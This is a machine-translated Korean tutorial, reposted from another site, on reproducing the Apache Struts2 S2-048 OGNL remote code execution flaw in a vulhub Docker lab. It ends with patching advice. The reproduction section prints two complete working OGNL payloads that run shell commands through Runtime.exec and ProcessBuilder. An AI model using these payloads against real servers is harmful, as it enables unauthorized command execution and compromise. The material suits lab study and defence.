>  기사  >  운영 및 유지보수  >  Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법

Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법

WBOY
WBOY앞으로
2023-05-12 19:43:101551검색

0x00소개

Struts2 프레임워크는 Java EE 웹 애플리케이션 개발을 위한 오픈 소스 웹 애플리케이션 아키텍처입니다. Java Servlet API를 활용 및 확장하고 개발자가 MVC 아키텍처를 채택하도록 권장합니다. Struts2는 WebWork의 뛰어난 디자인 아이디어를 핵심으로 삼고 Struts 프레임워크의 장점 중 일부를 흡수하며 MVC 디자인 패턴으로 구현된 더욱 깔끔한 웹 애플리케이션 프레임워크를 제공합니다.

0x01 취약점 개요

Apache Struts2 2.3.x 시리즈에는 struts2-struts1-plugin 플러그인이 활성화되어 있고 struts2-showcase 디렉토리가 존재하는 이유는 ActionMessage가 고객이 제어할 수 있는 매개변수 데이터를 수신할 때입니다. 후속 데이터 접합이 전달됨 부적절한 사후 처리로 인해 임의 코드 실행이 발생함

0x02 영향 범위

struts2-struts1-plugin 플러그인이 활성화된 Apache Struts 2.3.x 시리즈 버전.

0x03 환경 구축

1. Apache Struts2를 직접 구축하는 것은 더 복잡합니다. 이 취약성 환경은 vulhub의 docker 환경을 사용하여 구축됩니다.

다운로드 주소: https://github.com/vulhub/vulhub

2. 다운로드 후 압축을 풀고 s2-048 디렉터리에 들어가서 취약점 환경을 시작하세요

cd cd vulhub-master/struts2/s2-048/ //디렉터리 입력

怎么进行Apache Struts2--048远程代码执行漏洞复现docker-compose up -d //촬영 범위 시작

怎么进行Apache Struts2--048远程代码执行漏洞复现3. docker ps를 사용하여 시작 성공 여부를 확인하세요

怎么进行Apache Struts2--048远程代码执行漏洞复现4. ip:8080/hello 브라우저 .action에서 다음 페이지 환경이 설정되어 있는지 확인하세요

怎么进行Apache Struts2--048远程代码执行漏洞复现

0x04 취약점 재발

1 브라우저에 다음 링크를 입력하여 취약점 페이지에 접속하세요

http ://192.168.3.160:8080/integration/saveGangster.action

怎么进行Apache Struts2--048远程代码执行漏洞复现2. 첫 번째 양식 "Gangster Name"에 ${1+1}을 입력하고 아래에 원하는 내용을 입력한 후 실행된 OGNL을 보려면 제출을 클릭하세요. 표현식

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现2. Gangster Name"에서 ${1+1}을 다음 명령

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)으로 실행되는 페이로드 문으로 변경합니다.(# _memberAccess?(#_memberAccess=#dm):((# 컨테이너=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl. OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames() .clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@ org.apache.commons.io.IOUtils@toString(@ java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

怎么进行Apache Struts2--048远程代码执行漏洞复现

怎么进行Apache Struts2--048远程代码执行漏洞复现3 . Burp를 사용하여 패킷을 캡처하고 명령 실행을 위한 페이로드로 수정할 수도 있습니다. ?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil @class)).(#ognlUtil.getExcludedPackageNames().clear()).(# ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe ','/c',#cmd}:{'/bin/bash',' -c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p. RedirectErrorStream(true)).(#process=#p.start()).(# ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons. io.IOUtils@copy(#process.getInputStream(),#ros)).(# ros.flush())}

4. 자동화된 스크립트나 그래픽 도구를 사용하여 구현할 수 있으며 여기서는 설명하지 않습니다.

Tools는 GitHub에서 검색하고 다운로드할 수 있습니다

0x05 수리 제안

1. 업그레이드 최신 버전으로 업그레이드하는 것이 좋습니다

2. 비즈니스 상황에 따라 struts-2.3을 비활성화하고 닫습니다(삭제). .xappsstruts2-showcase.war 패키지

위 내용은 Apache Struts2-048 원격 코드 실행 취약점을 재현하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명:
이 기사는 yisu.com에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제